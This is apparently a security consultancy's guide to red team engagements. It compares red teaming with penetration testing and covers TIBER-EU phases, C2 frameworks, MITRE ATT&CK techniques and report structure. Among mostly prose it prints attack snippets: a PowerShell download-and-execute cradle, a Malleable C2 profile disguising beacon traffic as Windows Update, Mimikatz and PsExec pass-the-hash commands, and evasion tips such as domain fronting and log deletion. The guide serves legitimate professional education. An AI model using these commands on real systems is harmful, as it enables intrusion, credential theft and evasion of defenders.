Red Teaming: Angriffssimulationen professionell durchführen
Comprehensive Guide to Red Team Operations: Differences from penetration testing, the TIBER-EU framework, red team phases (from reconnaissance to reporting), C2 infrastructure, commonly used TTPs, and how organizations benefit from red team engagements.
Table of Contents (6 sections)
Red teaming is the most realistic form of security assessment: A specialized team simulates a real, targeted attack—using the same methods, tools, and mindset that actual attacker groups would employ. Unlike a penetration test, there is no defined scope and no pre-agreed target—only the mission: "Get your hands on the crown jewels."
Red Team vs. Penetration Test
Penetration Test:
Scope: Defined scope (e.g., 5 IP ranges, 2 web applications)
Goal: Find as many technical vulnerabilities as possible
Duration: 5–30 days
Knowledge: Often gray-box (login credentials, source code known)
Blue Team: Knows that the test is taking place (white-box or gray-box)
Outcome: List of all vulnerabilities found + recommendations
Red Team Operation:
Scope: Entire organization (people, processes, technology)
Goal: Reach the "crown jewels" (e.g., compromise AD,
read production database, take over CEO account)
Duration: 4–12 weeks
Knowledge: Black-box (like a real attacker)
Blue Team: Does NOT know that the exercise is underway! (testing actual detection)
Outcome: Realistic assessment of detection and response capabilities
When to use penetration testing, when to use Red Team?
Penetration testing when:
→ Testing new systems before go-live
→ Compliance requirements (ISO 27001, PCI DSS)
→ Checking for known security vulnerabilities
→ Limited resources (budget, time)
Red Team when:
→ Mature security organization (SOC in place!)
→ To test detection and response capabilities
→ Realistic attacker simulation (APT level)
→ TIBER-EU / DORA compliance (financial sector)
→ As the next step after multiple successful penetration testsTIBER-EU - Red Teaming in the Financial Sector
TIBER-EU (Threat Intelligence-based Ethical Red Teaming):
→ Developed by the ECB and national central banks
→ Mandatory for systemically important financial institutions (DORA compliance)
→ In Germany: TIBER-DE (Bundesbank implementation)
→ NIS2: Critical infrastructures face increasingly similar requirements
TIBER-EU Phases:
Phase 1 - Generic Threat Intelligence:
→ Threat intelligence provider analyzes: Which attacker groups
typically target institutions of this type and size?
→ Output: Threat Landscape Report (TLR)
Phase 2 - Targeted Threat Intelligence:
→ Specific research on the institution:
Which systems? Which employees? Which attack vectors?
→ Output: Targeted Threat Intelligence (TTI) Report
Phase 3 - Red Team Test:
→ 12-week simulation using TTI-based scenarios
→ Realistic APT methods (MITRE ATT&CK;)
→ Blue Team is unaware that the test is underway!
Phase 4 - Closure:
→ Findings are shared with the Blue Team
→ Remediation plan created
→ Certificate / Purple Team Session
TIBER-EU Deliverables:
→ Scoped Red Team Test Report (confidential)
→ Purple Team Report (MITRE ATT&CK; Coverage)
→ Remediation TrackerRed Team Phases - PTES Extension for Full Scope
Phase 1: Pre-Engagement (2–4 weeks)
→ Define Rules of Engagement (RoE):
- What can be simulated? (Ransomware? DDoS? Physical intrusion?)
- Get-out-of-jail card: Who to call if an alarm is triggered?
- Emergency Stop: Criteria for immediate termination
- Scoping: Which systems are out of scope? (Production databases?)
→ Define Crown Jewels (with management):
"What is the worst thing an attacker could succeed in doing?"
→ Gather threat intelligence about the organization
Phase 2: OSINT and external reconnaissance (1–2 weeks)
→ LinkedIn: Employees, technologies, IT service providers
→ OSINT: Public code repositories, paste sites, dark web
→ Shodan/Censys: External attack surface
→ Domain reconnaissance: Subdomains, MX, SPF, DKIM
→ Credential leaks: HaveIBeenPwned, dark web search
Phase 3: Attempting initial access (2–4 weeks)
→ Spear-phishing campaign using OSINT findings
→ Password spraying on VPN/OWA (leaked credentials)
→ Exploitation of public services (web apps, VPN CVEs)
→ Physical access (social engineering, badge cloning)
→ Supply chain (third-party access)
Phase 4: Post-exploitation and lateral movement (2–4 weeks)
→ Privilege escalation: from user to admin to domain admin
→ Credential harvesting: Mimikatz, LaZagne, browser passwords
→ Lateral Movement: PsExec, WMI, Pass-the-Hash
→ Persistence: Registry, Scheduled Tasks, Golden Ticket
→ Maintain C2 communication
Phase 5: Accessing Crown Jewels
→ Achieve defined objectives:
- Full AD compromise (DCSync, Domain Admin)
- Access to production database
- Read CEO’s mailbox
- Deploy ransomware on test machine
→ Document all steps (timestamps, screenshots)
Phase 6: Reporting and Purple Team
→ Executive Summary: “We achieved X in Y weeks”
→ Technical Report: each TTP with evidence
→ MITRE ATT&CK; Navigator: which TTPs were used/detected?
→ Purple Team Session: Blue Team sees what Red Team did
→ Remediation: joint action planC2 Framework - Command and Control
C2 (Command and Control) is the Red Team’s communication infrastructure:
→ Implants on compromised systems
→ Encrypted connection to the C2 server
→ Send commands, exfiltrate data, maintain persistence
Professional C2 Frameworks (for authorized red teaming only!):
Cobalt Strike:
→ Gold standard for red teams
→ Beacon: modular implant (HTTP/HTTPS/DNS/SMB communication)
→ Malleable C2 Profiles: Beacon mimics legitimate traffic
→ Commercial, expensive (~$3,500/year per user)
→ Also abused by ransomware groups!
Havoc (Open Source Alternative):
→ Python-based C2 (similar to Cobalt Strike)
→ Free, actively developed
→ Less easily detected by EDR systems (since it’s newer)
Mythic (Open Source):
→ Modular C2 framework with web UI
→ 70+ agents (payloads) available
→ Multi-operator support for large red teams
Brute Ratel C4 (BRc4):
→ Commercial, developed by former EDR engineers
→ Specifically designed to bypass EDR
---
Malleable C2 Profiles (Disguising Beacon Traffic):
By default: Beacon sends HTTP requests that look like Cobalt Strike
→ EDR and NDR detect this pattern!
With Malleable Profiles: Traffic looks like a legitimate service
# Example: Traffic disguised as a Microsoft Update
http-get {
set uri "/windowsupdate/v6/GetManifest.aspx";
client {
header "Host" "update.microsoft.com";
header "User-Agent" "Windows-Update-Agent/10.0.10011.16384";
metadata {
base64url;
parameter "CatalogID";
}
}
}
→ NDR sees: normal HTTP traffic to a domain resembling microsoft.com
→ In reality: C2 communication with Red Team server
---
C2 Infrastructure Setup (Team Server):
Red Team Server (VPS with cloud provider):
→ Redirector in front (prevents direct C2 IP fingerprinting)
→ CDN usage (Cloudflare) for camouflage
→ Domain fronting (domain belongs to CDN, traffic goes to C2)
Domain Selection:
→ Aged domain (> 1 year old) → better reputation
→ "Categorized" in web proxy databases (e.g., as "Business")
→ Similar to legitimate domains (microsoft-update.net instead of c2.evil.com)Common Red Team TTPs
MITRE ATT&CK techniques frequently used by Red Teams:
Initial Access:
T1566.001 Spear Phishing Attachment:
→ Word/Excel with macros or ISO file
→ HTML Smuggling: Payload is assembled in the browser
T1190 Exploit Public-Facing Application:
→ Log4Shell, Citrix, Exchange ProxyLogon
Execution:
T1059.001 PowerShell:
→ Cradles: IEX (New-Object Net.WebClient).downloadString("http://...")
→ AMSI Bypass: Bypassing the antivirus scanner
T1059.003 Windows Command Shell
Persistence:
T1053.005 Scheduled Task:
→ schtasks /create /tn "Windows Defender Update" /tr "..."
T1547.001 Registry Run Keys
Privilege Escalation:
T1078 Valid Accounts (Stolen Credentials)
T1134 Access Token Manipulation
Defense Evasion:
T1562.001 Impair Defenses: Disable AV
T1070.004 File Deletion: Delete Event Logs
T1027 Obfuscated Files or Information
Credential Access:
T1003.001 LSASS Memory (Mimikatz):
sekurlsa::logonpasswords
T1558.003 Kerberoasting:
Request Service Tickets → Offline Crack
Lateral Movement:
T1021.002 SMB/Windows Admin Shares (PsExec):
psexec \\target -u admin -p hash cmd.exe
T1021.006 Windows Remote Management (WinRM):
Enter-PSSession -ComputerName target
Exfiltration:
T1048 Exfiltration Over Alternative Protocol:
→ DNS Tunneling (dnscat2, iodine)
→ ICMP Tunneling (icmpsh)
T1041 Exfiltration Over C2 ChannelRed Team Report - Structure
Executive Summary (2–3 pages):
→ Timeframe and scope
→ Objectives and whether/how they were achieved
→ Critical findings in 3–5 bullet points
→ Overall risk assessment
→ Most important immediate actions
Attack Narrative (Core Section):
→ Chronological sequence of the attack
→ "Day 1: Spear-phishing email sent to 3 targets..."
→ "Day 7: Domain admin compromised via Kerberoasting..."
→ Screenshots, timestamps, evidence
→ Understandable for non-technical readers!
Technical Findings:
→ Each finding includes:
- MITRE ATT&CK; technique (T-number)
- CVSS score
- Evidence (screenshot, log excerpt)
- Immediate action
- Long-term action
MITRE ATT&CK; coverage:
→ Which TTPs were used?
→ Which ones did the Blue Team detect?
→ Which ones did the Blue Team NOT detect?
→ Navigator export for visualization
Remediation Roadmap:
→ Immediate actions (< 7 days): close critical gaps
→ Short-term (< 30 days): key hardening
→ Medium-term (< 90 days): structural improvements
→ Long-term (< 1 year): architectural improvementsQuestions about this topic?
Our experts advise you free of charge and without obligation.
About the Author
M.Sc. IT-Sicherheit mit über 5 Jahren Erfahrung in offensiver Sicherheitsanalyse. Leitet die Durchführung von Penetrationstests mit Spezialisierung auf Web-Applikationen, Netzwerk-Infrastruktur, Reverse Engineering und Hardware-Sicherheit. Verantwortlich für mehrere Responsible Disclosures.
OSCP+ OSCP OSWP OSWA
